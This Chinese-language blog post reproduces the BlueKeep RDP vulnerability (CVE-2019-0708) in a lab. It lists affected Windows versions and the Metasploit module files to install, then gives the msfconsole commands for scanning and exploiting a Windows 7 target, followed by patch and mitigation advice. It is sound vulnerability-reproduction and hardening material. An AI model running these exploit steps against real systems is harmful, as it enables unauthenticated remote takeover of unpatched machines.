si1ent

CVE-2019-0708复现

2019-09-07

2019年9月7日凌晨,metasploit官方发布CVE-2019-0708漏洞利用代码,该EXP可以通过RDP协议进行远程代码执行攻击.官方描述此漏洞相关危害可参考2017年WannaCry事件,强烈建议用户及时安装补丁以避免受到损失.

漏洞始末

漏洞原理

CVE-2019-0708(远程代码执行漏洞),当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时,即可以触发该漏洞.此漏洞属于预身份验证,无需用户交互,成功利用此漏洞的攻击者可以安装应用程序,查看、更改或删除数据或创建具有完全用户权限的新账户.

恶意攻击者还很有可能利用该漏洞编写定制的恶意软件,利用此漏洞的恶意软件传播影响都可能与2017年WannaCry恶意软件遍布全球的事件类似,由于EXP的公开发布,需要广大用户更加警惕利用该漏洞的恶意软件的出现,提前做好预防措施.

漏洞时间

2019-5-14 Microsoft发布安全更新公告并披露漏洞.

2019-9-7 EXP发布并复现验证,证实该EXP可导致服务器远程代码执行,特再次发布预警,提供解决方案给广大企业用户.

影响范围

目前受影响的Windows版本:
Microsoft Windows XP
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1

漏洞类型

远程代码执行

漏洞验证

环境准备

Metasploit
EXP对应脚本
Windows 7 x64 旗舰版6.1.7601 Service Pack 1 Build 7601

实操

Metasploit模块重载

该EXP被发布者在Metasploit的官方Github的Pull Request中,但尚未加载进Metasploit的官方框架中. 所以下载EXP对应脚本并进行替换!!!!!直接替换!!!

msf对应位置:

1
2
3
4
5
6
7
rdp.rb ----> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb ----> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb ----> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb ----> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

重载模块

msf5>reload_all

漏洞检测

1
2
3
msf5>use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5>set RHOSTS 172.16.144.142
msf5>run

漏洞利用

1
2
3
4
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 172.16.144.142
set target 3(target根据自己系统版本设定)
run

可能存在问题

* set target 1 - bluescreen(可能出现蓝屏重启)
* set target 3 - success
如果出现下图:

尝试设置: set ForceExploit true

漏洞加固

及时进行补丁更新

Microsoft在2019年5月14日修复了该漏洞
补丁下载地址
以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新
补丁下载地址

缓解措施

在无法及时安装微软安全更新的情况下作为临时性解决方案

  • 若用户不需要用到远程桌面服务,建议禁用该服务.
  • 开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2 以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新.

参考

1
2
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
https://mp.weixin.qq.com/s/Mf5TuATyyU7-W2VDHCRKnA
Tags: CVE
使用支付宝打赏
使用微信打赏

若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏

扫描二维码,分享此文章